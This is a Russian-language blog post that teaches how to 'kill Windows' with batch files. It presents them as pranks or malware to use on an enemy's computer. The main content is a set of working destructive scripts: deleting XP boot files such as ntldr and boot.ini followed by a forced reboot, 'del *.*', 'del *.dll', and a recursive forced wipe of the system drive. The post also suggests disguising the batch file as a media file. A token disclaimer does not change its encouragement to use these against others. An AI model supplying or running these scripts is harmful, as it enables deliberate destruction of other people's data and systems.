Как убить Windows ? Быстро и навсегда.

Как убить Windows, или батники-вредоносы на компьютере врага.

убить windowsВНИМАНИЕ! Следующая информация приведена только для ознакомительных целей. Применение и исполнение указанных приёмов может привести к повреждению операционной системы Windows. По своему действию созданные файлы исполняют вредоносный код,  уничтожающий важнейшие файлы на компьютере. Затираются жизненно важные файлы или все файлы полностью. 

Всем привет, это очередной компьютерный трюк от блога Компьютер76. Следующий трюк на самом деле таковым не является, ибо это самый настоящий вредонос, по исполнению которого произойдёт уничтожение жизненно важных системных файлов, после чего операционная система Windows перестанет существовать. Так что используйте его на свой страх и риск, и тем более не стоит запускать его на своём компьютере: воспользуйтесь виртуальной машиной. В конце статьи – небольшое для того видео на эту тему.

Все описываемые ниже команды – скрипты команд для консоли cmd, сохранённые в так называемый файл-батник (файл с расширением .bat). Такие файлы легко можно создавать с помощью обычного Блокнота, заставив систему в Свойствах папки показывать расширения файлов:

свойства папки

Принцип создания такого файла прост:

  • создаёт текстовый файл
  • пишем нужный код
  • сохраняем документ, но вместо расширения .txt пишем .bat
  • всё

Как убить Windows . Вариант первый: убиваем Windows XP .

Собственно, если внимательно присмотреться, то видно как этот код сможет убить именно windows xp, и почему он бесполезен для более поздних версий. Но приступим… Как всегда, перво-наперво создадим пустой документ Блокнота и внесём в поле следующий код:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
shutdown -r -f -t 00

Как видите, команды последовательно стирают системные файлы операционной системы windows xp, необходимые для загрузки системы и запуска . Так что восстановить систему будет, мягко говоря, трудновато. Человек должен вам сильно насолить, если вы решитесь использовать  ” вирус ” против кого бы-то ни было и убить windows . После запуска файла потребуется перезагрузка, чтобы система была уничтожена. Последняя в её жизни перезагрузка.

Как убить Windows . Вариант второй: убиваем Wndows любой версии.

Нам предстоит создать ” вирусы “, которые, в свою очередь, удаляют либо абсолютно все файлы, либо затрагивают некоторые из директорий. Речь идёт о файлах как системных, так и личного характера (созданных, скачанных и т.д.) По своим качествам гораздо серьёзнее, нежели предыдущий вариант, ибо некоторую информацию с жёсткого диска придётся восстанавливать с помощью специальных программ. Это займёт (в зависимости от объёма винчестера) от 5-х до 20-ми минут, всё зависит от производительности компьютера и объёма удаляемых данных.

Для этого создадим документ Блокнота и в пустом поле впишем следующий код. Да какой там код – вот эту строчку:

@echo off
del *.*

Эта простая команда удаляет все файлы с любым существующим расширением. Узнавать, как оба «вируса» работают на вашем компьютере или ноутбуке, крайне не советую. Но список уничтожаемых файлов можно резко сократить, что не помешает убить windows навсегда, а времени жертве на раздумье не останется и горе-пользователь ничего не сможет предпринять. Просто не успеет. Команда сработает для версий windows 7/8.1 /10. Она, конечно, громоздка. И потому у этой команды есть вариации.

Так, в список уничтожаемых файлов достаточно внести жизненно важные для windows файлы с расширением .dll в папке System. Тогда код убийства windows будет иметь вид:

@echo off
del *.dll

Как убить Windows, удалив диск?

Нет, целый том вы не удалите. Спрятать можно. Но можно “почистить” его содержимое:

echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Основное назначение батника – вызвать BSOD, который должен быть неминуемой реакцией на удаление системных файлов. Однако его вы, скорее всего, не увидите: защищённые файлы система удалить не даст. Но нам это и не нужно. Процесс “наведёт порядок” везде, где только возможно, так что испортить Windows получится по-настоящему:

Как видите, несколько строчек кода, и система перестаёт существовать. К сожалению, на эту удочку может попасться каждый. Особенно, если это происходит на фоне факта, когда злоумышленнику не составит никакого труда спрятать простенький батник в любой файл, замаскировав его в видео или аудио ролик, рисунок, фотографию или даже текстовый файл. Подробнее это, например, описано в статье Как спрятать троян в рисунок. Будьте бдительны.

Успехов

Ещё больше компьютерных приколов

2 ответа к «Как убить Windows ? Быстро и навсегда.»

  1. Не работает, ребята. Неужели нет вируса которым можно повредить это дерь…? Большинство файлов десятки не только невозможно изменить, но вообще не доступны(на компах просто исчезают гигабайты памяти). Неужели никто не знает, как избавиться от этого дер…? Помогите, кто-нибудь, очистить мои компьютеры. Мне нужны рабочие компьютеры, а не эти глючные, тормозящие, вечно(в самые не подходящие моменты) обновляющиеся убожества.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Максимальный размер загружаемого файла: 50 МБ. Вы можете загрузить: изображение, видео. Ссылки на YouTube, Facebook, Twitter и другие сервисы, вставленные в текст комментария, будут автоматически встроены. Перетащите файлы сюда